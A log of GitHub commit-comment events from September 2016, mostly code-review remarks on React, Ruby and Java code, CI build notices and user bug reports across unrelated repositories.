{"id":"4550091887","type":"CommitCommentEvent","actor":{"login":"nish1013"},"repo":{"name":"Kevin-Robertson/Inveigh"},"payload":{"comment":{"id":18986826,"position":null,"line":null,"path":null,"commit_id":"387cfea5b08fbbb168ba8f8e3b54f5acf58c86b4","created_at":"2016-09-12T15:41:12Z","updated_at":"2016-09-12T15:41:12Z","body":"@Kevin-Robertson \r\nAre you the Kevin who owns https://www.amazon.co.uk/gp/registry/wishlist/1TVV7FVJ769W3/ref=cm_wl_rlist_go_v ? "}},"created_at":"2016-09-12T15:41:12Z"}
{"id":"4550095262","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"bkwsuper24/react-starter"},"payload":{"comment":{"id":18986833,"position":35,"line":35,"path":"ui/movie_display.jsx","commit_id":"ddd7a58b6ca7ef6da524ce1628d7033fe7bdfce7","created_at":"2016-09-12T15:41:45Z","updated_at":"2016-09-12T15:41:45Z","body":"This is functionally correct, but generally you define prop types within the class definition:\r\n\r\n    class MovieDisplay extends React.Component {\r\n      static propTypes = {\r\n        movie: React.PropTypes.object,\r\n      }\r\n\r\n      render() {\r\n        ...\r\n      }\r\n    }"}},"created_at":"2016-09-12T15:41:45Z"}
{"id":"4550104607","type":"CommitCommentEvent","actor":{"login":"dkorolev"},"repo":{"name":"KnowSheet/CTFO_BE"},"payload":{"comment":{"id":18986854,"position":null,"line":null,"path":null,"commit_id":"b6c3f8eaaf855b72730745947cb1710ca48e1fe9","created_at":"2016-09-12T15:43:14Z","updated_at":"2016-09-12T15:43:14Z","body":":+1: \r\n\r\nГриша, предлагаю это change merge-ить в ближайшем будущем, если у тебя вдруг нет планов над ним посидеть с краской и клеем. :-)"}},"created_at":"2016-09-12T15:43:14Z"}
{"id":"4550105601","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"bkwsuper24/react-starter"},"payload":{"comment":{"id":18986856,"position":7,"line":7,"path":"ui/movie_display.jsx","commit_id":"ddd7a58b6ca7ef6da524ce1628d7033fe7bdfce7","created_at":"2016-09-12T15:43:26Z","updated_at":"2016-09-12T15:43:26Z","body":"If the `constructor` is not defined, it is implicitly called like this:\r\n\r\n    constructor(props) {\r\n      super(props);\r\n    }\r\n\r\nLine 6 is actually unnecessary because the calling `super` (which calls `React.Component` `constructor`) will attach `props` to `this.props`."}},"created_at":"2016-09-12T15:43:26Z"}
{"id":"4550106625","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"sumoist/basic_course"},"payload":{"comment":{"id":18986859,"position":30,"line":79,"path":"Lesson_5/train.rb","commit_id":"923a1491f0a1721fd40ad5f061d89c7bae4a8d71","created_at":"2016-09-12T15:43:35Z","updated_at":"2016-09-12T15:43:35Z","body":"Идея правильная, но хорошо бы избавиться от второго параметра `type`. Ведь мы вызываем метод `find` для конкретного класса, а это значит что тип уже известен. У тебя в текущей архитектуре тип доступен для объектов класса Поезда, но это можно изменить. Например, вынести тип в константу:\r\n\r\n```ruby\r\nclass Train\r\n\r\n  @@trains = {}\r\n\r\n  def initialize(number)\r\n    @number = number\r\n    @@trains[@type] = { number => self }\r\n  end\r\n  \r\n  def self.find(number)\r\n    return unless self.respond_to?(:type)\r\n\r\n    @@trains[type][number]\r\n  end\r\nend\r\n\r\nclass PassengerTrain < Train\r\n\r\n  TYPE = :passenger\r\n\r\n  def initialize(number)\r\n    @type = self.class.type\r\n    super\r\n  end\r\n\r\n  def self.type\r\n    TYPE\r\n  end\r\n\r\nend\r\n\r\nPassengerTrain.new(121)\r\np Train.find(121)\r\np PassengerTrain.find(121)\r\n```"}},"created_at":"2016-09-12T15:43:35Z"}
{"id":"4550106972","type":"CommitCommentEvent","actor":{"login":"keks93"},"repo":{"name":"Bauuuuu/android_kernel_zte_nx512j"},"payload":{"comment":{"id":18986861,"position":null,"line":null,"path":null,"commit_id":"0d05ff40732dcb84424e8eadb681ec7a28d5d0de","created_at":"2016-09-12T15:43:38Z","updated_at":"2016-09-12T15:43:38Z","body":"зачем это нужно? может отменить?"}},"created_at":"2016-09-12T15:43:38Z"}
{"id":"4550109909","type":"CommitCommentEvent","actor":{"login":"Gh14Cc10"},"repo":{"name":"ivanfemia/abap2xlsx"},"payload":{"comment":{"id":18986868,"position":null,"line":null,"path":null,"commit_id":"612ead65f4e79cc19ec9ecd4bea0a7e69a7faee1","created_at":"2016-09-12T15:44:07Z","updated_at":"2016-09-12T15:44:07Z","body":"Thank you @fidley !"}},"created_at":"2016-09-12T15:44:07Z"}
{"id":"4550111001","type":"CommitCommentEvent","actor":{"login":"FrankRoy"},"repo":{"name":"FrankRoy/Milestone-1A"},"payload":{"comment":{"id":18986876,"position":2,"line":44,"path":"README.md","commit_id":"12e4ddaeca3cc1c34926c18ce3a9090ab75a00bd","created_at":"2016-09-12T15:44:18Z","updated_at":"2016-09-12T15:44:18Z","body":"Gretting"}},"created_at":"2016-09-12T15:44:18Z"}
{"id":"4550115638","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":18986894,"position":null,"line":null,"path":null,"commit_id":"54b5e98f731781d95e3519ac2817b9ec3b8d17f6","created_at":"2016-09-12T15:45:01Z","updated_at":"2016-09-12T15:45:01Z","body":"**[unitTests_js_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_js_branches/32528/testReport/) for this commit**"}},"created_at":"2016-09-12T15:45:01Z"}
{"id":"4550115791","type":"CommitCommentEvent","actor":{"login":"VasilijSviridov"},"repo":{"name":"libimobiledevice/libimobiledevice"},"payload":{"comment":{"id":18986896,"position":null,"line":null,"path":null,"commit_id":"72643b2b83990b9cf97cc84b285b30763d44a72d","created_at":"2016-09-12T15:45:03Z","updated_at":"2016-09-12T15:45:03Z","body":"do we need to compile it by ourselves ? \r\nI tried installed the latest version but it doesn't work on iOS10  due to lockdowns :/ \r\n\r\nAny help ?"}},"created_at":"2016-09-12T15:45:03Z"}
{"id":"4550120916","type":"CommitCommentEvent","actor":{"login":"mauritsvanrees"},"repo":{"name":"zestsoftware/zest.releaser"},"payload":{"comment":{"id":18986907,"position":null,"line":null,"path":null,"commit_id":"332609715cdbd77713cf21d563a990fe970dea15","created_at":"2016-09-12T15:45:54Z","updated_at":"2016-09-12T15:45:54Z","body":"Not sure about this version number... ;-)"}},"created_at":"2016-09-12T15:45:54Z"}
{"id":"4550123145","type":"CommitCommentEvent","actor":{"login":"dany20mh"},"repo":{"name":"bgemmill/acd_cli"},"payload":{"comment":{"id":18986913,"position":null,"line":null,"path":null,"commit_id":"d135b519bd1a92ee60e30a91a79aa944e42c44f3","created_at":"2016-09-12T15:46:17Z","updated_at":"2016-09-12T15:46:17Z","body":"I'm trying to run this on with the code :\r\npip3 install --upgrade git+https://github.com/bgemmill/acd_cli.git\r\n\r\nAnd after I run the acdcli, I get this error sometimes (but the acdicli is working):\r\n\r\n```\r\n16-09-12 11:39:43.782 [DEBUG] [acdcli.acd_fuse] - -> access / (0,)\r\n16-09-12 11:39:43.782 [DEBUG] [acdcli.acd_fuse] - <- access 0\r\n16-09-12 11:39:43.782 [DEBUG] [acdcli.acd_fuse] - -> getxattr / ('com.apple.FinderInfo', 0)\r\n16-09-12 11:39:43.782 [DEBUG] [acdcli.acd_fuse] - <- getxattr 21\r\nTraceback (most recent call last):\r\n  File \"/Library/Frameworks/Python.framework/Versions/3.5/lib/python3.5/site-packages/fuse.py\", line 495, in _wrapper\r\n    return func(*args, **kwargs) or 0\r\n  File \"/Library/Frameworks/Python.framework/Versions/3.5/lib/python3.5/site-packages/fuse.py\", line 647, in getxattr\r\n    name.decode(self.encoding), *args)\r\n  File \"/Library/Frameworks/Python.framework/Versions/3.5/lib/python3.5/site-packages/acdcli/acd_fuse.py\", line 311, in __call__\r\n    ret = getattr(self, op)(path, *args)\r\n  File \"/Library/Frameworks/Python.framework/Versions/3.5/lib/python3.5/site-packages/acdcli/acd_fuse.py\", line 444, in getxattr\r\n    return self._getxattr_bytes(node.id, name)\r\n  File \"/Library/Frameworks/Python.framework/Versions/3.5/lib/python3.5/site-packages/acdcli/acd_fuse.py\", line 459, in _getxattr_bytes\r\n    return binascii.a2b_base64(self._getxattr(node_id, name))\r\n  File \"/Library/Frameworks/Python.framework/Versions/3.5/lib/python3.5/site-packages/acdcli/acd_fuse.py\", line 447, in _getxattr\r\n    self._xattr_load(node_id)\r\n  File \"/Library/Frameworks/Python.framework/Versions/3.5/lib/python3.5/site-packages/acdcli/acd_fuse.py\", line 495, in _xattr_load\r\n    xattrs_str = self.cache.get_property(node_id, self.acd_client_owner, _XATTR_PROPERTY_NAME)\r\n  File \"/Library/Frameworks/Python.framework/Versions/3.5/lib/python3.5/site-packages/acdcli/cache/query.py\", line 339, in get_property\r\n    c.execute(PROPERTY_BY_ID_SQL, [node_id, owner_id, key])\r\nsqlite3.OperationalError: no such table: properties\r\n16-09-12 11:39:43.785 [DEBUG] [acdcli.acd_fuse] - -> access / (0,)\r\n16-09-12 11:39:43.785 [DEBUG] [acdcli.acd_fuse] - <- access 0\r\n16-09-12 11:39:43.786 [DEBUG] [acdcli.acd_fuse] - -> access / (0,)\r\n16-09-12 11:39:43.786 [DEBUG] [acdcli.acd_fuse] - <- access 0\r\n16-09-12 11:39:43.786 [DEBUG] [acdcli.acd_fuse] - -> access / (0,)\r\n```\r\n\r\n"}},"created_at":"2016-09-12T15:46:17Z"}
{"id":"4550137916","type":"CommitCommentEvent","actor":{"login":"asujenkinsapp"},"repo":{"name":"asujenkinsapp/sensu-plugins-slack"},"payload":{"comment":{"id":18986941,"position":null,"line":null,"path":null,"commit_id":"cb5eeccbffc803d14045e27046028713015b38cf","created_at":"2016-09-12T15:48:38Z","updated_at":"2016-09-12T15:48:38Z","body":"This is to support disabling event filtering which is deprecated in Sensu 0.26."}},"created_at":"2016-09-12T15:48:38Z"}
{"id":"4550142102","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"bkwsuper24/react-starter"},"payload":{"comment":{"id":18986960,"position":25,"line":14,"path":"ui/omdbapi.js","commit_id":"ddd7a58b6ca7ef6da524ce1628d7033fe7bdfce7","created_at":"2016-09-12T15:49:18Z","updated_at":"2016-09-12T15:49:18Z","body":"There's a bit more concise of a string interpolation syntax using backticks:\r\n\r\n    const api = fetch(`http://www.omdbapi.com/?i=${movieID}&plot=full&r=json`);"}},"created_at":"2016-09-12T15:49:18Z"}
{"id":"4550156774","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":18986988,"position":null,"line":null,"path":null,"commit_id":"0add49c4e58b0b3b2898f29163eb8fbd6ab9b9ed","created_at":"2016-09-12T15:51:34Z","updated_at":"2016-09-12T15:51:34Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 250](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1206&buildTypeId=Xbim_XbimGeometry_XbimGeometry) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:30:45"}},"created_at":"2016-09-12T15:51:34Z"}
{"id":"4550156826","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":18986989,"position":null,"line":null,"path":null,"commit_id":"151ea3fa034bb6bcf18f1fc70c5ae2cb678d8fa8","created_at":"2016-09-12T15:51:35Z","updated_at":"2016-09-12T15:51:35Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 251](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1207&buildTypeId=Xbim_XbimGeometry_XbimGeometry) is now running\n"}},"created_at":"2016-09-12T15:51:35Z"}
{"id":"4550160460","type":"CommitCommentEvent","actor":{"login":"abdulhaq-e"},"repo":{"name":"AngularClass/angular2-webpack-starter"},"payload":{"comment":{"id":18987000,"position":null,"line":null,"path":null,"commit_id":"746d2e97ee7e33720a6d63264d43c1c2e10e869d","created_at":"2016-09-12T15:52:13Z","updated_at":"2016-09-12T15:52:13Z","body":"@huineng If you are also seeking an answer, I got it already. The `lib` option in `tsconfig` can be set to a value which makes use of `core-js` irrelevant.\r\n\r\n```\r\n    \"lib\": [\r\n      \"dom\",\r\n      \"es6\"\r\n    ],\r\n```\r\n\r\nYou can read about it in TypeScript release notes."}},"created_at":"2016-09-12T15:52:13Z"}
{"id":"4550168124","type":"CommitCommentEvent","actor":{"login":"san650"},"repo":{"name":"ember-montevideo/meetups"},"payload":{"comment":{"id":18987013,"position":null,"line":null,"path":null,"commit_id":"85710e332a1d192eb7655541df2477b49295c0e8","created_at":"2016-09-12T15:53:25Z","updated_at":"2016-09-12T15:53:25Z","body":"👏 "}},"created_at":"2016-09-12T15:53:25Z"}
{"id":"4550171851","type":"CommitCommentEvent","actor":{"login":"Khaon"},"repo":{"name":"Khaon/android_kernel_samsung_a3xelte"},"payload":{"comment":{"id":18987019,"position":null,"line":null,"path":null,"commit_id":"449336a6f0854b71998b9ede727b47bb91c96406","created_at":"2016-09-12T15:54:02Z","updated_at":"2016-09-12T15:54:02Z","body":"Oh okay, thank you, I use barely my camera :P \r\n"}},"created_at":"2016-09-12T15:54:02Z"}
{"id":"4550177164","type":"CommitCommentEvent","actor":{"login":"hrenillo"},"repo":{"name":"HowProgrammingWorks/Letters"},"payload":{"comment":{"id":18987029,"position":null,"line":null,"path":null,"commit_id":"341ca8b42820056eaee4367bc4c0739df9b9f4ff","created_at":"2016-09-12T15:54:56Z","updated_at":"2016-09-12T15:54:56Z","body":"Будут ли среди них лекции со свободным посещением нестудентами кпи?"}},"created_at":"2016-09-12T15:54:56Z"}
{"id":"4550179129","type":"CommitCommentEvent","actor":{"login":"joelmmx"},"repo":{"name":"joelmmx/walmartAttach"},"payload":{"comment":{"id":18987037,"position":null,"line":null,"path":null,"commit_id":"968bd1164eb359e7cc5db9bc5d9cb157e7bbbe3d","created_at":"2016-09-12T15:55:15Z","updated_at":"2016-09-12T15:55:15Z","body":"BOrrar"}},"created_at":"2016-09-12T15:55:15Z"}
{"id":"4550183727","type":"CommitCommentEvent","actor":{"login":"diegotejadav"},"repo":{"name":"yiisoft/yii2-framework"},"payload":{"comment":{"id":18987047,"position":null,"line":null,"path":null,"commit_id":"17f7fc4d4faa907c3f5eb0fda5b7fa672fef0fd3","created_at":"2016-09-12T15:55:58Z","updated_at":"2016-09-12T15:55:58Z","body":"Thank you! this was driving me crazy after a composer update!"}},"created_at":"2016-09-12T15:55:58Z"}
{"id":"4550184065","type":"CommitCommentEvent","actor":{"login":"timelyportfolio"},"repo":{"name":"ateucher/rmapshaper"},"payload":{"comment":{"id":18987050,"position":null,"line":null,"path":null,"commit_id":"e7e0b4f3d8e67edda6bce59294c2e66ed971e90c","created_at":"2016-09-12T15:56:01Z","updated_at":"2016-09-12T15:56:01Z","body":"unexpected, but very nice, thanks!"}},"created_at":"2016-09-12T15:56:01Z"}
{"id":"4550185988","type":"CommitCommentEvent","actor":{"login":"psycofdj"},"repo":{"name":"psycofdj/xtdcpp"},"payload":{"comment":{"id":18987054,"position":null,"line":null,"path":null,"commit_id":"5f12c82627eccdc5a0a33f885c3d0e423fc05302","created_at":"2016-09-12T15:56:20Z","updated_at":"2016-09-12T15:56:20Z","body":"Build report #159349596 for sha 5f12c82627eccdc5a0a33f885c3d0e423fc05302:\n\n[![UnitTests](https://img.shields.io/badge/unittests-passed%20%282/2%29%20-brightgreen.svg)](#)\n[![Coverage](https://img.shields.io/badge/coverage-7.16%20%25-yellow.svg)](#)\n[![Cppcheck](https://img.shields.io/badge/cppcheck-2%20error%28s%29-yellow.svg)](#)\n[![Code statistics](https://img.shields.io/badge/cloc-1785%20/%208398%20%2821.26%20%25%29-yellow.svg)](#)\n[![Documentation](https://img.shields.io/badge/doc-success-brightgreen.svg)](#)\n[![Documentation coverage](https://img.shields.io/badge/doc--coverage-13.96%20%25-yellow.svg)](#)\n"}},"created_at":"2016-09-12T15:56:20Z"}
{"id":"4550191496","type":"CommitCommentEvent","actor":{"login":"mexmer"},"repo":{"name":"libimobiledevice/libimobiledevice"},"payload":{"comment":{"id":18987064,"position":null,"line":null,"path":null,"commit_id":"72643b2b83990b9cf97cc84b285b30763d44a72d","created_at":"2016-09-12T15:57:12Z","updated_at":"2016-09-12T15:57:12Z","body":"you sure, this will communicate with iOS 5, when you remove SSL 3?"}},"created_at":"2016-09-12T15:57:12Z"}
{"id":"4550192674","type":"CommitCommentEvent","actor":{"login":"ElementalKiss"},"repo":{"name":"ElementalKiss/TIL"},"payload":{"comment":{"id":18987067,"position":null,"line":null,"path":null,"commit_id":"7e1ef3a36805a21173c68b8940a021fcdd06e5a4","created_at":"2016-09-12T15:57:23Z","updated_at":"2016-09-12T15:57:23Z","body":"거  CC8님 여기서 지식폭행 하시면 아니되옵니다 ^-^;;;\r\n프로그래밍보다 더 심각한 장벽 영어 ㅋㅋㅋㅋㅋㅋㅋㅋ"}},"created_at":"2016-09-12T15:57:23Z"}
{"id":"4550193183","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"bkwsuper24/react-starter"},"payload":{"comment":{"id":18987068,"position":2,"line":2,"path":"ui/actions.js","commit_id":"4fb33aad6ce9a55111477f5558ab81cf8cbcd39d","created_at":"2016-09-12T15:57:28Z","updated_at":"2016-09-12T15:57:28Z","body":"These constants are called types, and are generally stored in their own file (types.js):\r\n\r\n    export default {\r\n      SEARCHING: 'SEARCHING',\r\n      RESULT_SINGLE_MOVIE: 'RESULT_SINGLE_MOVIE',\r\n    }\r\n\r\nThen you can just import them:\r\n\r\n    import types from './types';\r\n\r\n    export function searchAllMovies(searchWord) {\r\n      return { type: types.SEARCHING, searchWord };\r\n    }"}},"created_at":"2016-09-12T15:57:28Z"}
{"id":"4550193966","type":"CommitCommentEvent","actor":{"login":"psycofdj"},"repo":{"name":"psycofdj/xtdcpp"},"payload":{"comment":{"id":18987071,"position":null,"line":null,"path":null,"commit_id":"ccb415f1afb10ce42f7683b3ae41111a29cd42e4","created_at":"2016-09-12T15:57:35Z","updated_at":"2016-09-12T15:57:35Z","body":"Build report #159349582 for sha ccb415f1afb10ce42f7683b3ae41111a29cd42e4:\n\n[![UnitTests](https://img.shields.io/badge/unittests-passed%20%282/2%29%20-brightgreen.svg)](#)\n[![Coverage](https://img.shields.io/badge/coverage-7.16%20%25-yellow.svg)](#)\n[![Cppcheck](https://img.shields.io/badge/cppcheck-2%20error%28s%29-yellow.svg)](#)\n[![Code statistics](https://img.shields.io/badge/cloc-1785%20/%208398%20%2821.26%20%25%29-yellow.svg)](#)\n[![Documentation](https://img.shields.io/badge/doc-success-brightgreen.svg)](#)\n[![Documentation coverage](https://img.shields.io/badge/doc--coverage-13.96%20%25-yellow.svg)](#)\n"}},"created_at":"2016-09-12T15:57:35Z"}
{"id":"4550194592","type":"CommitCommentEvent","actor":{"login":"sdumitriu"},"repo":{"name":"phenotips/phenotips"},"payload":{"comment":{"id":18987072,"position":8,"line":189,"path":"components/vocabularies/api/src/main/java/org/phenotips/vocabulary/Vocabulary.java","commit_id":"395d875a0cf283ed3aef7d8150f9ff32901ff413","created_at":"2016-09-12T15:57:41Z","updated_at":"2016-09-12T15:57:41Z","body":"Don't mention `HPO`"}},"created_at":"2016-09-12T15:57:41Z"}
{"id":"4550195416","type":"CommitCommentEvent","actor":{"login":"atjonathan"},"repo":{"name":"Musare/MusareNode"},"payload":{"comment":{"id":18987075,"position":null,"line":null,"path":null,"commit_id":"0bef3e4433f697d0468a378e716e9c4c0bd286af","created_at":"2016-09-12T15:57:49Z","updated_at":"2016-09-12T15:57:49Z","body":"@luveti, already fixed 😉 "}},"created_at":"2016-09-12T15:57:49Z"}
{"id":"4550195975","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"bkwsuper24/react-starter"},"payload":{"comment":{"id":18987077,"position":5,"line":4,"path":"ui/app.jsx","commit_id":"4fb33aad6ce9a55111477f5558ab81cf8cbcd39d","created_at":"2016-09-12T15:57:55Z","updated_at":"2016-09-12T15:57:55Z","body":"You don't need the `.js` file extension, webpack will actually resolve that for you."}},"created_at":"2016-09-12T15:57:55Z"}
{"id":"4550196501","type":"CommitCommentEvent","actor":{"login":"admish"},"repo":{"name":"MichMich/MagicMirror"},"payload":{"comment":{"id":18987078,"position":null,"line":null,"path":null,"commit_id":"ae37fa2bc598301c69688c78a9adb0e270ad66ef","created_at":"2016-09-12T15:57:59Z","updated_at":"2016-09-12T15:57:59Z","body":"The addition of that slash displays my weather around 290ºF."}},"created_at":"2016-09-12T15:57:59Z"}
{"id":"4550198910","type":"CommitCommentEvent","actor":{"login":"Trishthedish"},"repo":{"name":"Trishthedish/big-o"},"payload":{"comment":{"id":18987084,"position":null,"line":null,"path":null,"commit_id":"d02d7f1a432619ce27e5f3ea495ee32b4280500d","created_at":"2016-09-12T15:58:23Z","updated_at":"2016-09-12T15:58:23Z","body":"@sudocrystal: I thought I made a pull request, but this page seems to indicate I didn't.\r\n"}},"created_at":"2016-09-12T15:58:23Z"}
{"id":"4550201430","type":"CommitCommentEvent","actor":{"login":"litch"},"repo":{"name":"dnbert/prm"},"payload":{"comment":{"id":18987090,"position":null,"line":null,"path":null,"commit_id":"49041d6e5769e025f0aee2ce9ba11e8991f7e2d0","created_at":"2016-09-12T15:58:48Z","updated_at":"2016-09-12T15:58:48Z","body":"Was the intent there just to remove the [DEB ONLY] tag?  Right now the options output shows two lines there, which is confusing."}},"created_at":"2016-09-12T15:58:48Z"}
{"id":"4550202147","type":"CommitCommentEvent","actor":{"login":"sdumitriu"},"repo":{"name":"phenotips/phenotips"},"payload":{"comment":{"id":18987092,"position":2,"line":83,"path":"components/vocabularies/chebi/api/src/main/java/org/phenotips/vocabulary/internal/solr/ChEBIOntology.java","commit_id":"395d875a0cf283ed3aef7d8150f9ff32901ff413","created_at":"2016-09-12T15:58:54Z","updated_at":"2016-09-12T15:58:54Z","body":"The javadoc is now inherited from the interface, you can remove it from each implementing class."}},"created_at":"2016-09-12T15:58:54Z"}
{"id":"4550203478","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"bkwsuper24/react-starter"},"payload":{"comment":{"id":18987094,"position":24,"line":22,"path":"ui/app.jsx","commit_id":"4fb33aad6ce9a55111477f5558ab81cf8cbcd39d","created_at":"2016-09-12T15:59:09Z","updated_at":"2016-09-12T15:59:09Z","body":"Generally I don't like to wrap attributes for elements onto more than one line. Either collapse them onto one line, or move the component to its own render function:\r\n\r\n    renderInput() {\r\n      const props = {\r\n        type: 'text',\r\n        placeholder: 'Search Movies Here',\r\n        value: this.props.searchWord,\r\n      };\r\n      return <input {...props} />\r\n    }"}},"created_at":"2016-09-12T15:59:09Z"}
{"id":"4550206689","type":"CommitCommentEvent","actor":{"login":"mintty"},"repo":{"name":"saitoha/mintty-sixel"},"payload":{"comment":{"id":18987101,"position":null,"line":null,"path":null,"commit_id":"959418bbdc8d683f27d0fcf00b2ff7c6596baa89","created_at":"2016-09-12T15:59:41Z","updated_at":"2016-09-12T15:59:41Z","body":"Also, I guess this patch would not cover SIXEL images with text being right of them (not tried)."}},"created_at":"2016-09-12T15:59:41Z"}
{"id":"4550206845","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"bkwsuper24/react-starter"},"payload":{"comment":{"id":18987103,"position":9,"line":9,"path":"ui/omdbapi.js","commit_id":"4fb33aad6ce9a55111477f5558ab81cf8cbcd39d","created_at":"2016-09-12T15:59:42Z","updated_at":"2016-09-12T15:59:42Z","body":":+1:"}},"created_at":"2016-09-12T15:59:42Z"}
{"id":"4550208687","type":"CommitCommentEvent","actor":{"login":"tericky"},"repo":{"name":"tericky/wdwJS"},"payload":{"comment":{"id":18987107,"position":null,"line":null,"path":null,"commit_id":"26d0f513bb9e2804c180daf03ef57593567c64f0","created_at":"2016-09-12T15:59:59Z","updated_at":"2016-09-12T15:59:59Z","body":"The stop status of ride has three type of Tokyo Disney. The following is the simple description.\r\n\r\n1. 運営・公演中止\r\n    If you see this status, it's mean that ride was shutdown all day. It will be never turn to active today.\r\n2. 一時運営中止\r\n    If the status show this word out, it's mean the ride is temporarily turn off for some reason, it will be open again for few minutes or few hours later(or maybe shutdown all day).\r\n3. 案内終了\r\n    Special type ride, like gallery or transportation, this status mean that it's closed.\r\n\r\nSo, when those status showing up, waitime should be set to -1 and active flag should be false.\r\n\r\nIf you want, I would be happy to merge this commit to wdwJS repo."}},"created_at":"2016-09-12T15:59:59Z"}
{"id":"4550210108","type":"CommitCommentEvent","actor":{"login":"bdolor"},"repo":{"name":"pressbooks/pressbooks"},"payload":{"comment":{"id":18987111,"position":106,"line":106,"path":"includes/modules/themeoptions/sections/class-pb-weboptions.php","commit_id":"3463e3f915d63922605838dfdc864d1db5a9f5ae","created_at":"2016-09-12T16:00:15Z","updated_at":"2016-09-12T16:00:15Z","body":"I just noticed this feature we built has been deprecated. It is/was used on a number of our books, specifically ones that address adult literacy and two books on accessibility. It offered a way for unauthenticated users to choose a larger font size if that was a barrier to reading the book. Are there plans for re-introducing it, or addressing accessibility features in general? Can there be a way to be notified if certain features are slated for deprecation so we can have time to offer this functionality a different way? "}},"created_at":"2016-09-12T16:00:15Z"}
{"id":"4550210785","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"bkwsuper24/react-starter"},"payload":{"comment":{"id":18987115,"position":25,"line":25,"path":"ui/sagas.js","commit_id":"4fb33aad6ce9a55111477f5558ab81cf8cbcd39d","created_at":"2016-09-12T16:00:20Z","updated_at":"2016-09-12T16:00:20Z","body":"You can use `takeEvery` instead of having a `while(true)` loop around a `take`"}},"created_at":"2016-09-12T16:00:20Z"}
{"id":"4550222299","type":"CommitCommentEvent","actor":{"login":"rurban"},"repo":{"name":"perl11/cperl"},"payload":{"comment":{"id":18987131,"position":5,"line":810,"path":"Porting/Maintainers.pl","commit_id":"ca167a247f622492331c90914c865ffeecbb9bc4","created_at":"2016-09-12T16:02:11Z","updated_at":"2016-09-12T16:02:11Z","body":"do you want to upload it, or just file a PR?"}},"created_at":"2016-09-12T16:02:11Z"}
{"id":"4550226128","type":"CommitCommentEvent","actor":{"login":"mfonville"},"repo":{"name":"opengapps/aosp_build"},"payload":{"comment":{"id":18987136,"position":5,"line":21,"path":"README.md","commit_id":"325f100280ef67d0bea548d59949fbdb52445deb","created_at":"2016-09-12T16:02:49Z","updated_at":"2016-09-12T16:02:49Z","body":"=arm64 (!)"}},"created_at":"2016-09-12T16:02:49Z"}
{"id":"4550227824","type":"CommitCommentEvent","actor":{"login":"b1conrad"},"repo":{"name":"Picolab/node-pico-engine"},"payload":{"comment":{"id":18987138,"position":null,"line":null,"path":null,"commit_id":"194d34a1fa925dc9d3ec53facc11223706a9b139","created_at":"2016-09-12T16:03:07Z","updated_at":"2016-09-12T16:03:07Z","body":"hm. this has been broken for five days. in ruleset.html we always want to display the latest _registered_ source version. that way, we can get it enabled"}},"created_at":"2016-09-12T16:03:07Z"}
{"id":"4550232588","type":"CommitCommentEvent","actor":{"login":"deesto"},"repo":{"name":"deesto/voms"},"payload":{"comment":{"id":18987146,"position":null,"line":null,"path":null,"commit_id":"e3507d48c9e5ec17b478e42e99860a6ed1bd833b","created_at":"2016-09-12T16:03:57Z","updated_at":"2016-09-12T16:03:57Z","body":"=/ please change 'automitcally' to 'automatically' -- or I can re-fork to fix."}},"created_at":"2016-09-12T16:03:57Z"}
{"id":"4550233121","type":"CommitCommentEvent","actor":{"login":"Bauuuuu"},"repo":{"name":"Bauuuuu/android_kernel_zte_nx512j"},"payload":{"comment":{"id":18987148,"position":null,"line":null,"path":null,"commit_id":"0d05ff40732dcb84424e8eadb681ec7a28d5d0de","created_at":"2016-09-12T16:04:03Z","updated_at":"2016-09-12T16:04:03Z","body":"it will work even without this commit. exactly what it does is not clear .. "}},"created_at":"2016-09-12T16:04:03Z"}
{"id":"4550233492","type":"CommitCommentEvent","actor":{"login":"mrakitin"},"repo":{"name":"radiasoft/devops"},"payload":{"comment":{"id":18987149,"position":5,"line":10,"path":"debian/sirepo/root/etc/default/celery-sirepo","commit_id":"15e8d8e8a23602efbffc63564d86fba82a883eb2","created_at":"2016-09-12T16:04:07Z","updated_at":"2016-09-12T16:04:07Z","body":"@robnagler, do we need to use `SIREPO_MPI_CORES` here?"}},"created_at":"2016-09-12T16:04:07Z"}
{"id":"4550236576","type":"CommitCommentEvent","actor":{"login":"RadDesigns"},"repo":{"name":"RadDesigns/hello-world"},"payload":{"comment":{"id":18987156,"position":null,"line":null,"path":null,"commit_id":"7f7becefb2117f8bc1d82507d1cd0c0368514699","created_at":"2016-09-12T16:04:31Z","updated_at":"2016-09-12T16:04:31Z","body":"OK"}},"created_at":"2016-09-12T16:04:31Z"}
{"id":"4550240515","type":"CommitCommentEvent","actor":{"login":"diraol"},"repo":{"name":"kytos/python-openflow"},"payload":{"comment":{"id":18987169,"position":null,"line":null,"path":null,"commit_id":"61c8cdf800f5624259b93221c851af4fcc2797af","created_at":"2016-09-12T16:05:11Z","updated_at":"2016-09-12T16:05:11Z","body":"@cemsbr Why have you added the ``action_type``  attribute to the ``__init__`` method of ``ActionOutput`` class (Lines 200 and 209 of the new file version)?\r\n\r\nThis attribute is fixed on the given class isn't it ?"}},"created_at":"2016-09-12T16:05:11Z"}
